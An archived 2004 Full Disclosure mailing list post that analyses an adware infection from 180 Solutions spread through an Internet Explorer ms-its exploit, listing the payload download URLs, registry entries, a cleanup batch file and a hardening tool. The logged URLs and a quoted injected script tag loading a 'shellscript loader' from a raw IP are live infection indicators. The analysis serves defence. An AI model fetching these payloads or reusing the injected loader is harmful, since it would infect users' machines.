Home page logo
/

fulldisclosure logo Full Disclosure mailing list archives

180 Solutions Exploits and Toolbars Hacking Patched Users(I.E Exploits)
From: "Rafel Ivgi, The-Insider" <theinsider () 012 net il>
Date: Thu, 3 Jun 2004 04:20:48 +0200


                                                                     180
Solutions Exploits and Toolbars Hacking Patched Users

By Rafel Ivgi, The-Insider



Table Of Contents:
*********************
1. Class Name
2. Infecting Files
3. Related Registery Entries
4. Cleaner
5. Solution
6. Visit : http://theinsider.deep-ice.com



1. Class Name: iiittt Class
****************************
*Comment : All actions preformed on your machine are logged in the following
hidden file:
C:\WINDOWS\system32\log.bak.txt

Class Id : {FE1A240F-B247-4E06-A600-30E28F5AF3A0}
Downloading c:\install.cab
Excuting c:\install.htm



2. Infecting Files:
********************
http://bis.180solutions.com/config.aspx?did=565&ver=5.4&duid=!!generate!!&partner_id=&product_id=&browser_ok=y&rnd=34&basename=msbb&SID=YJGHCHUV&OS=5.1.2600.2&SLID=1037&ULID=1037&TLOC=1037&ACP=1255&OCP=862&DB=iexplore.exe&IEV=6.0.2800.1&TPM=267890688&APM=42033152&TVM=2147352576&AVM=2084216832&FDS=1542299648&LAD=1601:1:1:0:0:0&WE=5
http://downloads.180solutions.com/keywords/kyf.258.gz to
c:\windows\system32\kyf.dat
http://installs.180solutions.com/downloads/boom/2.0/RBoomerang.1 to
C:\WINDOWS\abolaror.exe
http://bis.180solutions.com/config.aspx?did=565&ver=5.4&duid=75abwcaqgjvflgcejdnaqqqzfsuohz&partner_id=181844781&product_id=565&browser_ok=y&rnd=26&basename=msbb&SID=AZWDUFMF&OS=5.1.2600.2&SLID=1037&ULID=1037&TLOC=1037&ACP=1255&OCP=862&DB=iexplore.exe&IEV=6.0.2800.1&TPM=267890688&APM=49520640&TVM=2147352576&AVM=2070482944&FDS=1538985984&LAD=1601:1:1:0:0:0&WE=5
c:\windows\system32\FLEOK\msbb.exe from
http://installs.180solutions.com/downloads/5.6/msbb.exe
http://installs.180solutions.com/downloads/5.6/msbb.exe to
c:\windows\system32\FLEOK\msbb.exe
http://bis.180solutions.com/config.aspx?did=565&ver=5.6&duid=75abwcaqgjvflgcejdnaqqqzfsuohz&partner_id=181844781&product_id=565&browser_ok=y&rnd=9&basen
ame=msbb&MID=774831B9D28472F7ED045AA9D3CCF92902BD254A&SID=NYBQFSPS&OS=5.1.26
00.2&SLID=1037&ULID=1037&TLOC=1037&ACP=1255&OCP=862&DB=iexplore.exe&IEV=6.0.
2800.1&TPM=267890688&APM=70152192&TVM=2147352576&AVM=2070474752&FDS=15387238
40&LAD=1601:1:1:0:0:0&WE=5&TCA=0&SCA=0&MRDS=0
http://installs.180solutions.com/Downloads/DLL/3.0/ncmyb.dll to
c:\windows\system32\FLEOK\ncmyb.dll
http://tv.180solutions.com/showme.aspx?keyword=.tightasianass.com&did=565&ver=5.6&duid=75abwcaqgjvflgcejdnaqqqzfsuohz&partner_id=181844781&product_id=565&browser_ok=y&rnd=32&basename=msbb&MID=774831B9D28472F7ED045AA9D3CCF92902BD254A&bid=0&SID=NYBQFSPS&OS=5.1.2600.2&SLID=1037&ULID=1037&TLOC=1037&ACP=1255&OCP=862&DB=iexplore.exe&IEV=6.0.2800.1&TPM=267890688&APM=61321216&TVM=2147352576&AVM=2051579904&FDS=1538109440&LAD=1601:1:1:0:0:0&WE=5
http://216.130.188.219/ei2/index.html
http://69.42.67.154/topbucks/tp2/index.html
http://216.130.188.219/ei2/installer.htm
http://69.42.67.154/topbucks/tp2/index.html
<SCRIPT%20SRC=\'http://216.130.188.219/ei2/shellscript_loader_js.php?ref=und
efined\'></SCRIPT>
http://exits.freepornpics.com/timed_exits/straight_timed_pop.htm
http://216.130.188.219/ei2/index.html
http://69.42.67.154/_mpbfpas/free_trial_multisite/index.html
http://tv.180solutions.com/showme.aspx?keyword=trial&did=565&ver=5.6&duid=75abwcaqgjvflgcejdnaqqqzfsuohz&partner_id=181844781&product_id=565&browser_ok=y&rnd=23&basename=msbb&MID=774831B9D28472F7ED045AA9D3CCF92902BD254A&bid=0&SID=NYBQFSPS&OS=5.1.2600.2&SLID=1037&ULID=1037&TLOC=1037&ACP=1255&OCP=862&DB=iexplore.exe&IEV=6.0.2800.1&TPM=267890688&APM=37040128&TVM=2147352576&AVM=2031108096&FDS=1536757760&LAD=1601:1:1:0:0:0&WE=5
http://exits.freepornpics.com/timed_exits/fpa_pinkpays.html
http://www.i-lookup.com/index1.php


3. Related Registery Entries:
******************************
[HKEY_CLASSES_ROOT\CLSID\{FE1A240F-B247-4E06-A600-30E28F5AF3A0}]
@="iiittt Class"

[HKEY_CLASSES_ROOT\CLSID\{FE1A240F-B247-4E06-A600-30E28F5AF3A0}\Control]

[HKEY_CLASSES_ROOT\CLSID\{FE1A240F-B247-4E06-A600-30E28F5AF3A0}\Implemented
Categories]

[HKEY_CLASSES_ROOT\CLSID\{FE1A240F-B247-4E06-A600-30E28F5AF3A0}\Implemented
Categories\{7DD95802-9882-11CF-9FA9-00AA006C42C4}]

[HKEY_CLASSES_ROOT\CLSID\{FE1A240F-B247-4E06-A600-30E28F5AF3A0}\InprocServer
32]
@="C:\\WINDOWS\\System32\\windec32.dll"
"ThreadingModel"="Apartment"

[HKEY_CLASSES_ROOT\CLSID\{FE1A240F-B247-4E06-A600-30E28F5AF3A0}\MiscStatus]
@="0"

[HKEY_CLASSES_ROOT\CLSID\{FE1A240F-B247-4E06-A600-30E28F5AF3A0}\MiscStatus\1
]
@="131473"

[HKEY_CLASSES_ROOT\CLSID\{FE1A240F-B247-4E06-A600-30E28F5AF3A0}\ProgID]
@="windec.iiittt.1"

[HKEY_CLASSES_ROOT\CLSID\{FE1A240F-B247-4E06-A600-30E28F5AF3A0}\Programmable
]

[HKEY_CLASSES_ROOT\CLSID\{FE1A240F-B247-4E06-A600-30E28F5AF3A0}\ToolboxBitma
p32]
@="C:\\WINDOWS\\System32\\windec32.dll, 102"

[HKEY_CLASSES_ROOT\CLSID\{FE1A240F-B247-4E06-A600-30E28F5AF3A0}\TypeLib]
@="{660B38CB-6349-4C67-A418-AADABAE09C38}"

[HKEY_CLASSES_ROOT\CLSID\{FE1A240F-B247-4E06-A600-30E28F5AF3A0}\Version]
@="1.0"

[HKEY_CLASSES_ROOT\CLSID\{FE1A240F-B247-4E06-A600-30E28F5AF3A0}\VersionIndep
endentProgID]
@="windec.iiittt"

[HKEY_CLASSES_ROOT\windec.iiittt]
@="iiittt Class"

[HKEY_CLASSES_ROOT\windec.iiittt\CLSID]
@="{FE1A240F-B247-4E06-A600-30E28F5AF3A0}"

[HKEY_CLASSES_ROOT\windec.iiittt\CurVer]
@="windec.iiittt.1"

[HKEY_CLASSES_ROOT\windec.iiittt.1]
@="iiittt Class"

[HKEY_CLASSES_ROOT\windec.iiittt.1\CLSID]
@="{FE1A240F-B247-4E06-A600-30E28F5AF3A0}"

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Code Store Database\Distribution
Units\{FE1A240F-B247-4E06-A600-30E28F5AF3A0}]
"SystemComponent"=dword:00000000
"Installer"="MSICD"

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Code Store Database\Distribution
Units\{FE1A240F-B247-4E06-A600-30E28F5AF3A0}\Contains]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Code Store Database\Distribution
Units\{FE1A240F-B247-4E06-A600-30E28F5AF3A0}\Contains\Files]
"C:\\WINDOWS\\System32\\windec32.dll"=""

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Code Store Database\Distribution
Units\{FE1A240F-B247-4E06-A600-30E28F5AF3A0}\DownloadInformation]
"CODEBASE"="file://C:\\install.cab"
"INF"="C:\\WINDOWS\\Downloaded Program Files\\windec32.inf"

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Code Store Database\Distribution
Units\{FE1A240F-B247-4E06-A600-30E28F5AF3A0}\InstalledVersion]
@="2,0,0,0"


4. Cleaner:
*************
Filename=180killer.bat:
 -------------------------------------------CUT
ERE  -------------------------------------------------
taskkill /f /im iexplore.exe
taskkill /f /im explorer.exe
taskkill /f /im dllhost.exe
del c:\install.htm
del c:\install.cab
taskkill /f /im abolaror.exe
del C:\WINDOWS\abolaror.exe
taskkill /f /im msbb.exe
del c:\windows\system32\FLEOK\msbb.exe
taskkill /f /im apconaj.exe
del c:\windows\system32\apconaj.exe
taskkill /f /im alchem.exe
del c:\windows\alchem.exe
rmdir /s /q c:\windows\system32\FLEOK
rmdir /s /q c:\windows\sbnet
del C:\WINDOWS\System32\windec32.dll
explorer.exe
reg DELETE HKLM\Software\Microsoft\Windows\CurrentVersion\Run\ /v ShowBehind
/f
reg DELETE HKLM\Software\Microsoft\Windows\CurrentVersion\Run\ /v msbb /f
reg DELETE HKLM\Software\Microsoft\Windows\CurrentVersion\Run\ /v abolaror
/f
reg DELETE HKLM\Software\Microsoft\Windows\CurrentVersion\Run\ /v
chiqarsfneg /f
reg DELETE HKLM\Software\Microsoft\Windows\CurrentVersion\Run\ /v alchem /f
 -------------------------------------------CUT
ERE  -------------------------------------------------


5. Solution:
*************
The excution of this Internet Exploerer exploit was caused by ms-its[Even
Patched].
The ms-its protocol is not needed for windows normal operations, therefore
it should be removed.
XPLizer - Windows Hardning Frontend Tool - Updated for removing ms-its
protocol.
http://www.securiteam.com/tools/5EP081FCKI.html
The sources of XPLizer can be found at
http://theinsider.deep-ice.com/xplizer-src.zip
An executable version can be found at
http://theinsider.deep-ice.com/xplizer.zip
The official readme file for XPLizer can be found at
http://theinsider.deep-ice.com/readme.txt

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


  By Date           By Thread  

Current thread:
  • 180 Solutions Exploits and Toolbars Hacking Patched Users(I.E Exploits) Rafel Ivgi, The-Insider (Jun 03)
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]